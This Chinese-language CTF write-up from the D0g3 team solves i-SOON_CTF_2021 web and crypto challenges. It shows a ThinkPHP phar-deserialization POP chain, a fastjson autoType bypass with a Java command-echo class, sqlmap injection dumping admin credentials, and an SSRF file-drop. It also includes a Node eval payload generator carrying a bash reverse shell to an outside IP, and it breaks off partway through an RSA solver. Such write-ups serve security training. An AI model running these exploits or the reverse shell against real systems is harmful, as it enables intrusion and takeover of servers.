本文由 @D0g3 编写

i-SOON_CTF_2021 部分题目环境/源码后续将在Github开源
项目地址

WEB

EZ_TP

首先 www.zip 源码下载，找到路由，/?s=/index/index/hello，简单的变量覆盖，能读文件但找不到 flag ，看到 5.1.37 版本，考虑 phar 反序列化漏洞，网上找了个 exp ，再生成 phar 文件。

POC：

<?phpnamespace think {

abstract class Model

{

protected $append = [];

private $data = [];

function __construct()

{

$this->append = ["lin" => ["calc.exe", "calc"]];//让它成为__call里面的参数

$this->data = ["lin" => new Request()];//调用new Request()->visible($name)

}

}

class Request

{

protected $hook = [];

protected $filter = "system";

protected $config = [

// 表单ajax伪装变量

'var_ajax' => '_ajax',

];

function __construct()

{

$this->filter = "system";//让filterValue里面的$filter=system

$this->config = ["var_ajax" => 'lin'];//让input里面的$name = $this->config['var_ajax']=lin,$data就是get请求['lin'=>'calc']

$this->hook = ["visible" => [$this, "isAjax"]];//让filterValue里的$data = filterValue.$value = calc 、 $filter = filterValue.$filters = [0->system,1->$default] 、 $name = filterValue.$key = 'lin'

}

}}

namespace thinkprocesspipes {

use thinkmodelconcernConversion;

use thinkmodelPivot;

class Windows

{

private $files = [];

public function __construct()

{

$this->files = [new Pivot()];//为了调用module类

}

}}

namespace thinkmodel {

use thinkModel;

class Pivot extends Model

{

}

use thinkprocesspipesWindows;

echo base64_encode(serialize(new Windows()));}

namespace {

use thinkprocesspipesWindows;

@unlink("d.phar");

$phar = new Phar("d.phar"); //后缀名必须为phar,这里意思就是产生一个test.phar文件。

$phar->startBuffering();

$phar->setStub("__HALT_COMPILER(); ?>");//设置stub

$o=new Windows();

$phar->setMetadata($o);//将自定义的meta-data存入manifest

$phar->addFromString("test.txt","woshilnp");//添加要压缩的文件及文件内容//签名自动计算

$phar->stopBuffering();}?>

然后：

<?php

echo base64_encode(file_get_contents('d.phar'));

这里有一个小坑，变量覆盖的时候，+需要两次 urlencode ，

GET：

http://127.0.0.1/public/?s=index/index/hello&lin=ls /

POST:

world=a=phar://hello.txt%26hello=%25%35%38%25%33%31%25%33%39%25%34%39%25%35%31%25%35%35%25%37%38%25%35%35%25%35%38%25%33%30%25%34%65%25%35%30%25%35%34%25%35%36%25%34%32%25%34%61%25%35%34%25%34%35%25%35%36%25%35%33%25%34%62%25%34%33%25%36%62%25%33%37%25%34%39%25%34%34%25%33%38%25%32%62%25%34%34%25%35%31%25%37%32%25%34%36%25%34%31%25%35%31%25%34%31%25%34%31%25%34%31%25%35%31%25%34%31%25%34%31%25%34%31%25%34%32%25%34%35%25%34%31%25%34%31%25%34%31%25%34%31%25%34%32%25%34%31%25%34%31%25%34%31%25%34%31%25%34%31%25%34%31%25%34%33%25%35%30%25%34%31%25%35%31%25%34%31%25%34%31%25%35%34%25%37%61%25%36%66%25%37%39%25%34%65%25%37%61%25%36%66%25%36%39%25%36%34%25%34%37%25%36%38%25%37%30%25%36%32%25%36%64%25%37%34%25%36%33%25%36%33%25%34%38%25%34%61%25%37%36%25%35%39%25%33%32%25%35%36%25%37%61%25%36%33%25%33%31%25%37%38%25%37%37%25%36%31%25%35%38%25%34%32%25%36%63%25%36%33%25%33%31%25%37%38%25%35%38%25%36%31%25%35%37%25%33%35%25%36%62%25%36%32%25%33%33%25%36%34%25%37%61%25%34%39%25%36%61%25%36%66%25%37%38%25%34%66%25%36%65%25%37%34%25%37%61%25%34%66%25%36%61%25%34%64%25%33%30%25%34%66%25%36%39%25%34%39%25%34%31%25%36%34%25%34%37%25%36%38%25%37%30%25%36%32%25%36%64%25%37%34%25%36%33%25%36%33%25%34%38%25%34%61%25%37%36%25%35%39%25%33%32%25%35%36%25%37%61%25%36%33%25%33%31%25%37%38%25%37%37%25%36%31%25%35%38%25%34%32%25%36%63%25%36%33%25%33%31%25%37%38%25%35%38%25%36%31%25%35%37%25%33%35%25%36%62%25%36%32%25%33%33%25%36%34%25%37%61%25%34%31%25%34%37%25%35%61%25%37%30%25%36%32%25%34%37%25%35%36%25%37%61%25%34%39%25%36%61%25%37%34%25%36%38%25%34%66%25%36%61%25%34%35%25%33%36%25%36%35%25%33%32%25%36%62%25%33%36%25%34%64%25%34%34%25%37%34%25%35%30%25%34%66%25%36%61%25%34%35%25%33%33%25%34%66%25%36%39%25%34%61%25%33%30%25%36%31%25%34%37%25%36%63%25%37%35%25%36%31%25%33%31%25%37%38%25%37%34%25%36%32%25%33%32%25%35%32%25%36%63%25%36%32%25%34%36%25%37%38%25%35%31%25%36%31%25%35%38%25%35%61%25%37%36%25%36%34%25%34%33%25%34%39%25%33%36%25%34%64%25%36%61%25%37%30%25%33%37%25%36%33%25%37%61%25%36%66%25%33%35%25%34%66%25%36%39%25%34%39%25%34%31%25%34%62%25%36%37%25%34%32%25%36%38%25%36%33%25%34%38%25%34%32%25%36%63%25%36%32%25%36%64%25%35%31%25%36%39%25%34%66%25%33%32%25%34%35%25%33%36%25%34%64%25%35%34%25%37%30%25%33%37%25%36%33%25%37%61%25%36%66%25%37%61%25%34%66%25%36%39%25%34%61%25%37%33%25%36%31%25%35%37%25%33%34%25%36%39%25%34%66%25%33%32%25%34%35%25%33%36%25%34%64%25%36%61%25%37%30%25%33%37%25%36%31%25%35%34%25%36%66%25%37%37%25%34%66%25%33%33%25%34%64%25%33%36%25%34%66%25%34%34%25%36%66%25%36%39%25%35%39%25%33%32%25%34%36%25%37%33%25%35%39%25%37%39%25%33%35%25%36%63%25%36%35%25%34%37%25%35%35%25%36%39%25%34%66%25%33%32%25%36%62%25%33%36%25%34%64%25%35%34%25%37%34%25%37%61%25%34%66%25%36%61%25%35%31%25%33%36%25%34%39%25%36%64%25%34%65%25%36%38%25%36%32%25%34%37%25%34%64%25%36%39%25%34%66%25%33%33%25%33%31%25%33%39%25%36%33%25%37%61%25%36%66%25%37%38%25%34%65%25%37%61%25%36%66%25%36%39%25%34%31%25%34%38%25%35%32%25%36%66%25%36%31%25%35%37%25%33%35%25%37%32%25%35%38%25%34%35%25%33%31%25%37%36%25%35%61%25%34%37%25%35%36%25%37%33%25%34%31%25%34%37%25%35%32%25%36%38%25%36%34%25%34%37%25%34%35%25%36%39%25%34%66%25%33%32%25%34%35%25%33%36%25%34%64%25%35%34%25%37%30%25%33%37%25%36%33%25%37%61%25%36%66%25%37%61%25%34%66%25%36%39%25%34%61%25%37%33%25%36%31%25%35%37%25%33%34%25%36%39%25%34%66%25%33%30%25%33%38%25%33%36%25%34%64%25%35%34%25%34%64%25%33%36%25%34%39%25%36%65%25%35%32%25%36%66%25%36%31%25%35%37%25%33%35%25%37%32%25%35%38%25%34%36%25%34%61%25%36%63%25%36%33%25%35%38%25%35%36%25%36%63%25%36%33%25%33%33%25%35%31%25%36%39%25%34%66%25%36%61%25%34%64%25%33%36%25%36%35%25%33%33%25%34%64%25%33%36%25%34%65%25%37%61%25%36%66%25%36%39%25%34%31%25%34%33%25%36%66%25%34%31%25%36%31%25%34%37%25%33%39%25%37%36%25%36%31%25%37%39%25%34%39%25%33%37%25%35%39%25%35%34%25%36%66%25%37%38%25%34%66%25%36%65%25%37%34%25%37%61%25%34%66%25%36%61%25%36%33%25%33%36%25%34%39%25%36%65%25%35%61%25%37%30%25%36%33%25%33%32%25%36%63%25%36%39%25%36%32%25%34%37%25%35%35%25%36%39%25%34%66%25%33%32%25%34%35%25%33%36%25%34%64%25%36%61%25%37%30%25%33%37%25%36%31%25%35%34%25%36%66%25%37%37%25%34%66%25%33%33%25%34%39%25%33%36%25%34%66%25%35%34%25%37%34%25%37%30%25%34%66%25%36%61%25%34%35%25%33%37%25%36%33%25%37%61%25%36%66%25%33%32%25%34%66%25%36%39%25%34%61%25%37%30%25%36%33%25%33%30%25%34%36%25%37%31%25%35%39%25%35%38%25%36%37%25%36%39%25%34%66%25%33%33%25%33%31%25%33%39%25%36%33%25%37%61%25%36%66%25%33%35%25%34%66%25%36%39%25%34%39%25%34%31%25%34%62%25%36%37%25%34%32%25%36%64%25%36%31%25%35%37%25%37%38%25%33%30%25%35%61%25%35%38%25%34%39%25%36%39%25%34%66%25%33%33%25%34%64%25%33%36%25%34%65%25%36%61%25%36%66%25%36%39%25%36%33%25%33%33%25%36%63%25%37%61%25%36%34%25%34%37%25%35%36%25%37%34%25%34%39%25%36%61%25%37%34%25%37%61%25%34%66%25%36%61%25%36%62%25%33%36%25%34%39%25%36%37%25%34%31%25%37%31%25%34%31%25%34%37%25%34%65%25%37%36%25%36%32%25%36%64%25%35%61%25%37%30%25%35%61%25%37%39%25%34%39%25%33%37%25%35%39%25%35%34%25%36%66%25%37%38%25%34%66%25%36%65%25%37%34%25%37%61%25%34%66%25%36%61%25%36%37%25%33%36%25%34%39%25%36%65%25%35%61%25%36%38%25%36%33%25%36%63%25%33%39%25%36%38%25%36%31%25%36%64%25%34%36%25%33%34%25%34%39%25%36%61%25%37%34%25%37%61%25%34%66%25%36%61%25%34%64%25%33%36%25%34%39%25%36%64%25%37%38%25%37%30%25%36%32%25%36%39%25%34%39%25%33%37%25%36%36%25%35%38%25%33%31%25%33%39%25%36%36%25%35%38%25%33%31%25%33%39%25%34%33%25%34%31%25%34%31%25%34%31%25%34%31%25%34%38%25%35%32%25%36%63%25%36%33%25%33%33%25%35%31%25%37%35%25%36%34%25%34%38%25%36%38%25%33%30%25%34%33%25%34%31%25%34%31%25%34%31%25%34%31%25%34%32%25%35%30%25%37%37%25%36%65%25%35%37%25%34%35%25%34%39%25%34%31%25%34%31%25%34%31%25%34%31%25%33%31%25%33%34%25%35%35%25%36%63%25%34%65%25%37%32%25%35%39%25%34%32%25%34%31%25%34%31%25%34%31%25%34%31%25%34%31%25%34%31%25%34%31%25%34%31%25%36%34%25%33%32%25%33%39%25%37%61%25%36%31%25%34%37%25%36%63%25%37%33%25%36%32%25%36%65%25%34%34%25%34%38%25%34%66%25%37%38%25%36%62%25%37%34%25%35%35%25%35%36%25%36%34%25%36%37%25%34%65%25%36%31%25%34%35%25%36%31%25%37%37%25%37%61%25%36%64%25%34%33%25%36%34%25%37%31%25%34%62%25%37%39%25%36%32%25%37%33%25%34%33%25%35%34%25%34%34%25%37%37%25%34%39%25%34%31%25%34%31%25%34%31%25%34%32%25%34%38%25%35%31%25%36%62%25%33%31%25%34%33%25%30%61

ezjson

任意文件下载 file=/proc/self/fd/5 获得源码

有一个fastjson反序列化入口

@ResponseBody @RequestMapping({"/json"}) public String hello(HttpServletRequest request, HttpServletResponse response) {

String Poc = request.getParameter("Poc");

if (Poc != null) {

String pattern = ".*Exec.*|.*cmd.*";   /

boolean isMatch = Pattern.matches(pattern, Poc);

if (isMatch) {

return "No way!!!";

} else {

JSON.parse(Poc);

return Poc;

}

} else {

return "readme";

} }

fastjson版本为1.2.47,需要我们绕过autoType,然后去触发我们的App.Exec#getFlag(),其中正则用编码进行绕过

public String getFlag() throws Exception {

Exec defineclass = new Exec(this.getClass().getClassLoader());

Class clazz = defineclass.defineClass((String)null, this.ClassByte, 0,

this.ClassByte.length);

Method exec = clazz.getMethod("Exec", String.class);

Object Obj = clazz.newInstance();

exec.invoke(Obj, this.cmd);

return this.flag; }

因为用的是parse来进行反序列化,可以用$ref来调用getter,也可以通过su18师傅的方法

https://su18.org/post/fastjson-1.2.68/#%E5%89%8D%E8%A8%80

题目没有出网,构造命令回显(也可以写文件,然后通过最开始的文件下载获取flag)

import org.springframework.web.context.request.RequestContextHolder;import org.springframework.web.context.request.ServletRequestAttributes;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;import java.io.UnsupportedEncodingException;

public class payload{

static {

HttpServletRequest request =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest();

HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse();

String resHeader=request.getParameter ( "cmd" );

java.io.InputStream in = null;

try {

in = Runtime.getRuntime().exec(resHeader).getInputStream();

} catch (IOException e) {

e.printStackTrace();

}

BufferedReader br = null;

try {

br = new BufferedReader (new InputStreamReader(in, "GBK"));

} catch (UnsupportedEncodingException e) {

e.printStackTrace();

}

String line = null;

StringBuilder sb = new StringBuilder();

while (true) {

try {

if (!((line = br.readLine()) != null)) break;

} catch (IOException e) {

e.printStackTrace();

}

sb.append(line);

sb.append("n");

}

java.io.PrintWriter out = null;

try {

out = new java.io.PrintWriter(response.getOutputStream());

} catch (IOException e) {

e.printStackTrace();

}

out.write(sb.toString ());

out.flush();

out.close();

}

public void Exec(String cmd)throws Exception{

Runtime.getRuntime().exec(cmd);

}}

payload:

POST /json?cmd=cat /flag HTTP/1.1

Poc={

"name":{

"@type":"java.lang.Class",

"val":"x41x70x70x2ex45x78x65x63"

},

"y":{

"@type":"com.alibaba.fastjson.JSONObject",

"c": {

"@type":"x41x70x70x2ex45x78x65x63",                  "ClassByte":x'CAFEBABE0000003400950A0021004E0A004F00500A004F00510A005200530700540A000500550A0005005608002B0B005700580A0059005A07005B0A000B005C07005D07005E08005F0A000E00600A000D00610700620A0012005C0700630A0014004E0A000D00640A001400650800660700670B006800690A0019006A0A0014006B0A0019006C0A0019006D0A0019006E07006F0700700100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100094C7061796C6F61643B01000445786563010015284C6A6176612F6C616E672F537472696E673B2956010003636D640100124C6A6176612F6C616E672F537472696E673B01000A457863657074696F6E730700710100104D6574686F64506172616D65746572730100083C636C696E69743E010001650100154C6A6176612F696F2F494F457863657074696F6E3B0100264C6A6176612F696F2F556E737570706F72746564456E636F64696E67457863657074696F6E3B010007726571756573740100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010008726573706F6E73650100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B010009726573486561646572010002696E0100154C6A6176612F696F2F496E70757453747265616D3B01000262720100184C6A6176612F696F2F42756666657265645265616465723B0100046C696E6501000273620100194C6A6176612F6C616E672F537472696E674275696C6465723B0100036F75740100154C6A6176612F696F2F5072696E745772697465723B01000D537461636B4D61705461626C6507007207007307007407007507005B07005D07006207006307006701000A536F7572636546696C6501000C7061796C6F61642E6A6176610C002200230700760C007700780C0079007A07007B0C007C007D0100406F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F536572766C657452657175657374417474726962757465730C007E007F0C008000810700720C008200830700840C008500860100136A6176612F696F2F494F457863657074696F6E0C008700230100166A6176612F696F2F42756666657265645265616465720100196A6176612F696F2F496E70757453747265616D52656164657201000347424B0C002200880C002200890100246A6176612F696F2F556E737570706F72746564456E636F64696E67457863657074696F6E0100176A6176612F6C616E672F537472696E674275696C6465720C008A008B0C008C008D0100010A0100136A6176612F696F2F5072696E745772697465720700730C008E008F0C002200900C0091008B0C0092002A0C009300230C009400230100077061796C6F61640100106A6176612F6C616E672F4F626A6563740100136A6176612F6C616E672F457863657074696F6E0100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100106A6176612F6C616E672F537472696E670100136A6176612F696F2F496E70757453747265616D0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B01003C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374436F6E74657874486F6C646572010014676574526571756573744174747269627574657301003D28294C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374417474726962757465733B01000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B01000C676574506172616D65746572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B01000F7072696E74537461636B547261636501002A284C6A6176612F696F2F496E70757453747265616D3B4C6A6176612F6C616E672F537472696E673B2956010013284C6A6176612F696F2F5265616465723B2956010008726561644C696E6501001428294C6A6176612F6C616E672F537472696E673B010006617070656E6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E674275696C6465723B01000F6765744F757470757453747265616D01002528294C6A617661782F736572766C65742F536572766C65744F757470757453747265616D3B010019284C6A6176612F696F2F4F757470757453747265616D3B2956010008746F537472696E670100057772697465010005666C757368010005636C6F7365002100200021000000000003000100220023000100240000002F00010001000000052AB70001B10000000200250000000600010000000A00260000000C00010000000500270028000000010029002A00030024000000410002000200000009B800022BB6000357B10000000200250000000A0002000000310008003200260000001600020000000900270028000000000009002B002C0001002D000000040001002E002F0000000501002B0000000800300023000100240000025400060009000000BCB80004C00005B600064BB80004C00005B600074C2A1208B9000902004D014EB800022CB60003B6000A4EA7000A3A041904B6000C013A04BB000D59BB000E592D120FB70010B700113A04A7000A3A051905B60013013A05BB001459B700153A061904B60016593A05C70006A70020A7000A3A071907B6000C19061905B600175719061218B6001757A7FFD8013A07BB0019592BB9001A0100B7001B3A07A7000A3A081908B6000C19071906B6001CB6001D1907B6001E1907B6001FB10004001F002A002D000B0037004A004D00120060006B0071000B008E009D00A0000B000300250000007A001E0000000C000A000D0014000E001D000F001F0011002A0014002D0012002F00130034001500370017004A001A004D0018004F00190054001B0057001C0060001F006E002200710020007300210078002300800024008B0026008E0028009D002B00A0002900A2002A00A7002C00B1002D00B6002E00BB002F00260000007A000C002F0005003100320004004F00050031003300050073000500310032000700A20005003100320008000A00B1003400350000001400A7003600370001001D009E0038002C0002001F009C0039003A000300370084003B003C000400570064003D002C00050060005B003E003F0006008E002D004000410007004200000066000BFF002D0004070043070044070045070046000107004706FF00180005070043070044070045070046070048000107004906FD000B07004507004A0D420700470612FF0014000807004307004407004507004607004807004507004A07004B0001070047060001004C00000002004D',

"$ref":"$.y.c.flag"

}

}

}

ezcms

http://110.40.192.242:6003/

扫描目录

python3 .dirsearch.py -u http://110.40.192.242:6003/ -e *

得到源码web.zip
官网下载地址

https://www.sem-cms.cn/Images/down/Scshop1.5.zip

这个cms是刚出的一个商城管理系统，所以漏洞还是比较多的

代码审计

在/Core/Program/Ant_Rponse.php的提交订阅处存在sql注入

简单审计即可看到这三个参数是存在sql注入的，当然还有很多其他地方

这里在e_couid参数处进行bool注入

POST /Core/Program/Ant_Rponse.php?actions=ClearOrder&id=1 HTTP/1.1

Host: 110.40.192.242:6003

User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 49

Origin: http://110.40.192.242:6003

Connection: close

Referer: http://110.40.192.242:6003/

Cookie: PHPSESSID=bekub0gllm8avg8pp8kder0m0i

e_ml=aaaa%40qq.com&e_couid=6*&e_coucode=SEMCMS

python3 .sqlmap.py -r .1.txt --dbs --technique B

之后跑后台账号密码

python3 .sqlmap.py -r .1.txt  --technique B  -D semcms15 -T sc_user -C user_name,user_admin,user_ps --dump

密码解密为admin888/admin888

该cms在进行安装的时候会将后台目录进行随机命名，但是在源码中泄露了后台地址
CxWsbN_AR4

登录后台

之后得想办法获取服务器权限
在后台目录中有一个/CxWsbN_AR4/Ant_Curl.php文件，经过审计该有一个获取文件的功能

查看getfile函数

一个ssrf，并且会将我们的文件进行保存
构造payload

110.40.192.242:6003/CxWsbN_AR4/Ant_Curl.php?url=http://[email protected]/111.php

这里需要绕过一个检测

之后访问

http://110.40.192.242:6003/Soft/Zip/111.php

即可

RssblogV2.0

出题思路

出题思路来自Rsshub之前披露的漏洞风险通报

没有exp，简单跟了一下，大概问题就是爬取目标地址时，使用eval或Function来执行script字段，并且在测试过程中还意外发现能通过目录穿越来控制内容。即它本来是爬去单个页面，但通过路径穿越使得攻击面从单个网页扩大到了整个网站

然后简单按照这个思路出了rssblog，原本在陇原战疫就出了一个rssblog，但那道题由纯node实现，node解析路由是无法路径穿越的，当时时间紧迫就来不及改了，遂放了半成品上去hhh

后面自己又去github找了个php的简易博客魔改用来把文章相关功能分离开，就能路径穿越了

题解

拿到源码可知一共存在两个web服务，外层的PHP博客和内网中的node服务

简单看一下外面的php源码可以发现是就是一个简单的博客，具有文章增删查改的基础功能

在GetRss/index.php这里可以看到对内网中的node服务发起了请求，且获取了xml结果

那么看向node

这里获取了固定的http://localhost/Rssinfo/index.php/下的内容，回头看一下Rssinfo/index.php可以发现这里就是根据文章id返回相应信息的接口

而node服务正是获取其script标签中的var passage = {****}来执行

那是否我们能通过控制title或者author内容来闭合大括号来传入Function呢？

理论是可以的，但文章修改和发布都限制了strlen($title) > 10 || strlen($author) > 10

10个字符来RCE显然是行不通的，所以需要让它访问到我们发布的文章才行

回到node源码那里，可以看到访问id是直接拼接进URL的，那我们输入../../，传入request的就是http://localhost/Rssinfo/index.php/../../，即http://localhost/

答案呼之欲出了，就是通过目录穿越来访问到我们发布的文章，我们在发布的文章中构造payload来传入Function实现RCE

最后还有个点，因为页面防XSS缘故，单双引号都会被HTML实体编码，所以需要用String.fromCharCode绕一下

payload生成脚本如下

cmd = "bash -c 'bash -i >& /dev/tcp/82.157.130.188/1234 0>&1'"strs = ''for i in cmd:

num = ord(i)

strs += "String.fromCharCode("+str(num)+")+"payload = "var passage = {1:global.process.mainModule.require(String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(105)+String.fromCharCode(108)+String.fromCharCode(100)+String.fromCharCode(95)+String.fromCharCode(112)+String.fromCharCode(114)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(115)).exec("

+ strs.strip("+")

+ ")};"print(payload)

#child_process#String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(105)+String.fromCharCode(108)+String.fromCharCode(100)+String.fromCharCode(95)+String.fromCharCode(112)+String.fromCharCode(114)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(115)

将生成的payload拿去发布文章

然后查看文章链接，如我这里就是/article.show.php?id=2

那我们路径穿越就需要设置为../../article.show.php?id=2，然后双重URL编码一下(浏览器+curl_exec)

访问/GetRss/index.php/%252e%252e%252f%252e%252e%252f%2561%2572%2574%2569%2563%256c%2565%252e%2573%2568%256f%2577%252e%2570%2568%2570%253f%2569%2564%253d%2532即可收到shell

CRYPTO

little_trick

RSA的dp和dq泄露攻击。

dp每一位位与rands[i%4]进行同或，dq每一位是用一个rsa加密。（rands需要用python2生成）

from Crypto.Util.number import sieve_base, long_to_bytes

import gmpy2

import random

def decode(p,q,dp,dq,c,n):

invertP = gmpy2.invert(p,q)

m1 = gmpy2.powmod(c,dp,p)

m2 = gmpy2.powmod(c,dq,q)

m =( ( (m2-m1) * invertP ) * p + m1 ) % n

print(long_to_bytes((m)).decode())

p = 119494148343917708105807117614773529196380452025859574123211538859983094108015678321724495609785332508563534950957367289723559468197440246960403054020452985281797756117166991826626612422135797192886041925043855329391156291955066822268279533978514896151007690729926904044407542983781817530576308669792533266431

q = 125132685086281666800573404868585424815247082213724647473226016452471461555742194042617318063670311290694310562746442372293133509175379170933514423842462487594186286854028887049828613566072663640036114898823281310177406827049478153958964127866484011400391821374773362883518683538899757137598483532099590137741

n = p * q

c = 10238271315477488225331712641083290024488811710093033734535910573493409567056934528110845049143193836706122210303055466145819256893293429223389828252657426030118534127684265261192503406287408932832340938343447997791634435068366383965928991637536875223511277583685579314781547648602666391656306703321971680803977982711407979248979910513665732355859523500729534069909408292024381225192240385351325999798206366949106362537376452662264512012770586451783712626665065161704126536742755054830427864982782030834837388544811172279496657776884209756069056812750476669508640817369423238496930357725842768918791347095504283368032

seeds = [3, 0, 39, 78, 14, 49, 73, 83, 55, 48, 30, 28, 23, 16, 54, 23, 68, 7, 20, 8, 98, 68, 45, 36, 97, 13, 83, 68, 16, 59, 81, 26, 51, 45, 36, 60, 36, 94, 58, 11, 19, 33, 95, 12, 60, 38, 51, 95, 21, 3, 38, 72, 47, 80, 7, 20, 26, 80, 18, 43, 92, 4, 64, 93, 91, 12, 86, 63, 46, 73, 89, 5, 91, 17, 88, 94, 80, 42, 90, 14, 45, 53, 91, 16, 28, 81, 62, 63, 66, 20, 81, 3, 43, 99, 54, 22, 2, 27, 2, 62, 88, 99, 78, 25, 76, 49, 28, 96, 95, 57, 94, 53, 32, 58, 32, 72, 89, 15, 4, 78, 89, 74, 86, 45, 51, 65, 13, 75, 95, 42, 20, 77, 34, 66, 56, 20, 26, 18, 28, 11, 88, 62, 72, 27, 74, 42, 63, 76, 82, 97, 75, 92, 1, 5, 20, 78, 46, 85, 81, 54, 64, 87, 37, 91, 38, 39, 1, 90, 61, 28, 13, 60, 37, 90, 87, 15, 78, 91, 99, 58, 62, 73, 70, 56, 82, 5, 19, 54, 76, 88, 4, 3, 55, 3, 3, 22, 85, 67, 98, 28, 32, 42, 48, 96, 69, 3, 83, 48, 26, 20, 45, 16, 45, 47, 92, 0, 54, 4, 73, 8, 31, 38, 3, 10, 84, 60, 59, 69, 64, 91, 98, 73, 81, 98, 9, 70, 44, 44, 24, 95, 83, 49, 31, 19, 89, 18, 20, 78, 86, 95, 83, 23, 42, 51, 95, 80, 48, 46, 88, 7, 47, 64, 55, 4, 62, 37, 71, 75, 98, 67, 98, 58, 66, 70, 24, 58, 56, 44, 11, 78, 1, 78, 89, 97, 83, 72, 98, 12, 41, 33, 14, 40, 27, 5, 18, 35, 25, 31, 69, 97, 84, 47, 25, 90, 78, 15, 72, 71]

rands = [[23, 54, 36, 60] ,[84, 75, 42, 25] ,[20, 38, 19, 39] ,[81, 9, 92, 73] ,[10, 70, 65, 94] ,[6, 41, 11, 75] ,[27, 50, 56, 46] ,[49, 85, 8, 37] ,[9, 95, 14, 73] ,[54, 13, 71, 30] ,[53, 28, 3, 65] ,[11, 13, 59, 17] ,[92, 94, 89, 8] ,[36, 48, 41, 44] ,[91, 13, 55, 48] ,[92, 94, 89, 8] ,[74, 94, 74, 90] ,[32, 15, 65, 7] ,[90, 68, 76, 90] ,[22, 96, 12, 70] ,[35, 83, 35, 5] ,[74, 94, 74, 90] ,[27, 48, 8, 33] ,[32, 98, 95, 91] ,[19, 80, 37, 84] ,[25, 68, 68, 84] ,[49, 85, 8, 37] ,[74, 94, 74, 90] ,[36, 48, 41, 44] ,[22, 93, 94, 2] ,[50, 45, 55, 38] ,[74, 20, 20, 60] ,[24, 50, 16, 82] ,[27, 48, 8, 33] ,[32, 98, 95, 91] ,[30, 57, 26, 80] ,[32, 98, 95, 91] ,[54, 12, 28, 43] ,[58, 20, 64, 94] ,[45, 55, 92, 46] ,[67, 78, 52, 51] ,[57, 63, 81, 27] ,[76, 51, 99, 53] ,[47, 65, 66, 14] ,[30, 57, 26, 80] ,[63, 42, 72, 6] ,[24, 50, 16, 82] ,[76, 51, 99, 53] ,[16, 68, 63, 47] ,[23, 54, 36, 60] ,[63, 42, 72, 6] ,[7, 59, 98, 34] ,[35, 43, 45, 34] ,[27, 54, 70, 95] ,[32, 15, 65, 7] ,[90, 68, 76, 90] ,[74, 20, 20, 60] ,[27, 54, 70, 95] ,[18, 66, 33, 19] ,[3, 69, 14, 46] ,[42, 56, 55, 58] ,[23, 10, 39, 15] ,[47, 63, 40, 92] ,[91, 49, 56, 35] ,[8, 17, 68, 16] ,[47, 65, 66, 14] ,[79, 3, 83, 31] ,[44, 29, 90, 48] ,[88, 39, 58, 85] ,[27, 50, 56, 46] ,[8, 60, 99, 14] ,[62, 74, 79, 94] ,[8, 17, 68, 16] ,[52, 80, 96, 28] ,[39, 18, 90, 62] ,[54, 12, 28, 43] ,[27, 54, 70, 95] ,[63, 2, 27, 22] ,[20, 9, 65, 58] ,[10, 70, 65, 94] ,[27, 48, 8, 33] ,[61, 89, 45, 71] ,[8, 17, 68, 16] ,[36, 48, 41, 44] ,[11, 13, 59, 17] ,[50, 45, 55, 38] ,[92, 17, 97, 23] ,[44, 29, 90, 48] ,[7, 43, 24, 44] ,[90, 68, 76, 90] ,[50, 45, 55, 38] ,[23, 54, 36, 60] ,[3, 69, 14, 46] ,[40, 20, 17, 24] ,[91, 13, 55, 48] ,[95, 14, 2, 99] ,[95, 94, 5, 8] ,[64, 70, 95, 19] ,[95, 94, 5, 8] ,[92, 17, 97, 23] ,[39, 18, 90, 62] ,[40, 20, 17, 24] ,[81, 9, 92, 73] ,[37, 92, 84, 21] ,[37, 95, 20, 29] ,[6, 41, 11, 75] ,[11, 13, 59, 17] ,[37, 90, 39, 20] ,[76, 51, 99, 53] ,[4, 58, 1, 51] ,[54, 12, 28, 43] ,[61, 89, 45, 71] ,[7, 21, 30, 90] ,[58, 20, 64, 94] ,[7, 21, 30, 90] ,[7, 59, 98, 34] ,[8, 60, 99, 14] ,[96, 1, 73, 15] ,[23, 10, 39, 15] ,[81, 9, 92, 73] ,[8, 60, 99, 14] ,[85, 51, 11, 12] ,[79, 3, 83, 31] ,[27, 48, 8, 33] ,[24, 50, 16, 82] ,[41, 28, 84, 44] ,[25, 68, 68, 84] ,[45, 43, 4, 76] ,[76, 51, 99, 53] ,[63, 2, 27, 22] ,[90, 68, 76, 90] ,[79, 32, 24, 82] ,[52, 58, 84, 89] ,[7, 43, 24, 44] ,[96, 55, 47, 52] ,[90, 68, 76, 90] ,[74, 20, 20, 60] ,[18, 66, 33, 19] 